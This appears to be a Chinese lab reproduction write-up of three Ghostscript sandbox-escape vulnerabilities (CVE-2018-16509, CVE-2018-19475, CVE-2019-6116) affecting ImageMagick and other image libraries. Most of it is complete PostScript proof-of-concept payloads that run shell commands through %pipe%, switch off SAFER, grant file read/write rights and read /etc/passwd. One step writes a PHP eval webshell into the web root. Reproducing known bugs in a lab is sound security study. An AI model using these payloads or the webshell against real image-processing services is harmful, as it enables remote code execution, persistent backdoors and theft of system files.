GhostScript
GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。通过构造恶意的图片内容,就可以进行命令执行、文件读取、文件删除等等的操作。而这三个不通CVE只是利用的POC不同,其方法大同小异。
差异
CVE-2018-16509:Ghostscript9.24之前版本
CVE-2018-19475:Ghostscript9.26之前版本
CVE-2019-6116 :ghostscript 尚无 release 版本发布
commit c47512e5e638d903d69925f7ebab4de2aa3f481f 之前的版本均受到影响
ghostscript作为图像处理格式转换的底层应用。
漏洞导致所有引用ghostscript的上游应用受到影响。 涉及但不限于:
imagemagick
libmagick
graphicsmagick
gimp
python-matplotlib
texlive-core
texmacs
latex2html
latex2rtf 等
思路
GhostScript会处理经PostScript处理的图片内容,如果构造出夹杂着恶意指令的PostScript语句让它处理,它就会去执行,所以直接用已经搞好的poc。
复现
CVE-2018-16509
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%touch /tmp/test) currentdevice putdeviceprops
后台进入容器中发现创建成功
docker ps
docker exec -it <id> bash
ls /tmp
再次手动写入php一句话木马
echo '<?php @eval($_POST['cmd']);?>' > /var/www/html/test.php
或者页面进行命令执行
md不知道这样为什么写不进去
CVE-2018-19475
POC
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%touch /tmp/test) (w) file
CVE-2019-6116
POC
%!PS
% extract .actual_pdfpaintproc operator from pdfdict
/.actual_pdfpaintproc pdfdict /.actual_pdfpaintproc get def
/exploit {
(Stage 11: Exploitation...)=
/forceput exch def
systemdict /SAFER false forceput
userparams /LockFilePermissions false forceput
systemdict /userparams get /PermitFileControl [(*)] forceput
systemdict /userparams get /PermitFileWriting [(*)] forceput
systemdict /userparams get /PermitFileReading [(*)] forceput
% update
save restore
% All done.
stop
} def
errordict /typecheck {
/typecount typecount 1 add def
(Stage 10: /typecheck #)=only typecount ==
% The first error will be the .knownget, which we handle and setup the
% stack. The second error will be the ifelse (missing boolean), and then we
% dump the operands.
typecount 1 eq { null } if
typecount 2 eq { pop 7 get exploit } if
typecount 3 eq { (unexpected)= quit } if
} put
% The pseudo-operator .actual_pdfpaintproc from pdf_draw.ps pushes some
% executable errays onto the operand stack that contain .forceput, but are not
% marked as executeonly or pseudo-operators.
%
% The routine was attempting to pass them to ifelse, but we can cause that to
% fail because when the routine was declared, it used `bind` but many of the
% names it uses are not operators and so are just looked up in the dictstack.
%
% This means we can push a dict onto the dictstack and control how the routine
% works.
<<
/typecount 0
/PDFfile { (Stage 0: PDFfile)= currentfile }
/q { (Stage 1: q)= } % no-op
/oget { (Stage 3: oget)= pop pop 0 } % clear stack
/pdfemptycount { (Stage 4: pdfemptycount)= } % no-op
/gput { (Stage 5: gput)= } % no-op
/resolvestream { (Stage 6: resolvestream)= } % no-op
/pdfopdict { (Stage 7: pdfopdict)= } % no-op
/.pdfruncontext { (Stage 8: .pdfruncontext)= 0 1 mark } % satisfy counttomark and index
/pdfdict { (Stage 9: pdfdict)=
% cause a /typecheck error we handle above
true
}
>> begin <<>> <<>> { .actual_pdfpaintproc } stopped pop
(Should now have complete control over ghostscript, attempting to read /etc/passwd...)=
% Demonstrate reading a file we shouldnt have access to.
(/etc/passwd) (r) file dup 64 string readline pop == closefile
(Attempting to execute a shell command...)= flush
% run command
(%pipe%touch /tmp/test) (w) file closefile
(All done.)=
quit